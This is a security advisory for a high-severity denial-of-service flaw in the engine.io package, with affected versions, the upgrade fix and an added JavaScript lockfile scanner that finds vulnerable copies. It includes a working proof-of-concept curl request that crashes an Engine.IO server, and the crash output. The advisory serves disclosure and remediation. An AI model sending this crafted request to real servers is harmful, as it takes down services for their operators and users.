Uncaught Exception affecting engine.io package, versions >=4.0.0 <4.1.2, >=5.0.0 <5.2.1, >=6.0.0 <6.1.1


Severity: high

Snyk CVSS

    Attack Complexity: Low
    Availability: High

    Threat Intelligence

    Exploit Maturity: Proof of concept
    EPSS: 0.24% (62nd percentile)

NVD: 7.5 high

  • Snyk ID SNYK-JS-ENGINEIO-2336356
  • published 12 Jan 2022
  • disclosed 12 Jan 2022
  • credit Marcus Wejderot

How to fix?

Upgrade engine.io to version 4.1.2, 5.2.1, 6.1.1 or higher.
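
To check a project against the affected ranges, the added example below (not Snyk's or the engine.io project's code) scans the packages map of an npm lockfile for engine.io copies, including nested ones, and reports the fixed version for each affected copy. The function names and the sample lockfile are constructed for illustration, and prerelease suffixes are ignored.

```javascript
// Added example: ranges and fixed versions come from the advisory;
// the lockfile object below is constructed sample data.
const AFFECTED = [
  { from: "4.0.0", fixed: "4.1.2" },
  { from: "5.0.0", fixed: "5.2.1" },
  { from: "6.0.0", fixed: "6.1.1" },
];

// Parse "major.minor.patch"; prerelease/build suffixes are ignored (simplification).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return m.slice(1).map(Number);
}

function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Returns the fixed version to upgrade to, or null when the version is unaffected.
function fixedVersionFor(version) {
  const hit = AFFECTED.find(
    (r) => compareVersions(version, r.from) >= 0 && compareVersions(version, r.fixed) < 0
  );
  return hit ? hit.fixed : null;
}

// Walk the "packages" map of an npm v2/v3 lockfile, including nested copies.
function findVulnerable(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!/(^|\/)node_modules\/engine\.io$/.test(path) || !meta.version) continue;
    const fixed = fixedVersionFor(meta.version);
    if (fixed) hits.push({ path, version: meta.version, fixed });
  }
  return hits;
}

// Constructed sample lockfile (dependency names other than engine.io are made up).
const sampleLock = { lockfileVersion: 2, packages: {
  "": { name: "demo-app" },
  "node_modules/engine.io": { version: "6.1.0" },
  "node_modules/engine.io-parser": { version: "5.0.2" },
  "node_modules/legacy-dep/node_modules/engine.io": { version: "4.1.2" },
  "node_modules/other-dep/node_modules/engine.io": { version: "5.0.0" },
} };
console.log(findVulnerable(sampleLock));
```

Transitive copies matter here because a Socket.IO server pulls in engine.io as a dependency, so the top-level package.json may not mention it at all.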

Overview

engine.io is a realtime engine behind Socket.IO. It provides the foundation of a bidirectional connection between client and server.

Affected versions of this package are vulnerable to Uncaught Exception: a specially crafted HTTP request triggers an uncaught exception that kills the Node.js process running an Engine.IO or a Socket.IO server.

PoC:

With an Engine.IO server running on port 3000:

curl \
  -X 'GET' \
  -H $'Connection: Upgrade' \
  -H $'Upgrade: websocket' \
  -H $'Sec-WebSocket-Version: 13' \
  -H $'Sec-WebSocket-Key: DXR4dX615eRds8nRmlhqtw==' \
  -H $'Content-Type: application/x-www-form-urlencoded' \
  -H $'Content-Length: 27' \
  --data-binary 'app=cae417iahm&_method=POST' \
  'http://localhost:3000/engine.io/?EIO=4&transport=websocket'


Output:

node:events:368
      throw er; // Unhandled 'error' event
      ^

RangeError: Invalid WebSocket frame: RSV2 and RSV3 must be clear
    at Receiver.getInfo (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:176:14)
    at Receiver.startLoop (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:136:22)
    at Receiver._write (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:83:10)
    at writeOrBuffer (node:internal/streams/writable:389:12)
    at _write (node:internal/streams/writable:330:10)
    at Receiver.Writable.write (node:internal/streams/writable:334:10)
    at Socket.socketOnData (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/websocket.js:1116:35)
    at Socket.emit (node:events:390:28)
    at Socket.Readable.read (node:internal/streams/readable:527:10)
    at Socket.read (node:net:644:39)